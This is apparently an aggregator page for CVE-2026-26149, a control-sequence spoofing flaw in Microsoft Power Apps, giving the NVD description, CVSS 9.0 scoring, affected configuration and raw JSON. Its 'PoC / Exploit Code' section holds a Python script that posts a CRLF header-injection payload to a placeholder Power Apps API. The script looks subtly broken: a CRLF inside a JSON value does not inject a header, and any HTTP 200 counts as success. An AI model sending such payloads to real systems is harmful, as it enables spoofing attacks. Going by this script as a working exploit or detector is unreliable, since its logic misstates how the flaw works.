Security Vulnerability Report
中文
CVE-2026-26149 CVSS 9.0 CRITICAL

CVE-2026-26149

Published: 2026-04-14 18:16:46
Last Modified: 2026-05-07 20:06:17

Description

Improper neutralization of escape, meta, or control sequences in Microsoft Power Apps allows an authorized attacker to perform spoofing over a network.

CVSS Details

CVSS Score
9.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:power_apps:*:*:*:*:*:windows:*:* - VULNERABLE
Microsoft Power Apps (具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Conceptual Proof of Concept for CVE-2026-26149 # This script demonstrates how improper neutralization of control sequences # can potentially lead to spoofing in Microsoft Power Apps. TARGET_URL = "https://<target-powerapps-domain>/api/v1/endpoint" ATTACKER_PAYLOAD = "\r\nX-Spoofed-Header: malicious_content" def send_exploit(): headers = { "User-Agent": "CVE-2026-26149-Scanner", "Content-Type": "application/json" } # Injection point: simulating a vulnerable parameter data = { "username": "valid_user", "description": ATTACKER_PAYLOAD # Injecting control sequences } try: response = requests.post(TARGET_URL, json=data, headers=headers, timeout=10) print(f"[+] Status Code: {response.status_code}") # Check if the payload was reflected or caused spoofing behavior if "malicious_content" in response.text or response.status_code == 200: print("[+] Potential spoofing vulnerability detected!") print("[+] Response snippet:", response.text[:200]) else: print("[-] Exploit did not trigger expected behavior.") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") if __name__ == "__main__": print("[*] Starting PoC for CVE-2026-26149...") send_exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-26149", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:16:45.790", "lastModified": "2026-05-07T20:06:17.310", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of escape, meta, or control sequences in Microsoft Power Apps allows an authorized attacker to perform spoofing over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-150"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:power_apps:*:*:*:*:*:windows:*:*", "versionEndExcluding": "3.26032.10.0", "matchCriteriaId": "DFFF6D46-6068-4B5C-BAAE-0DBB907BC173"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26149", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}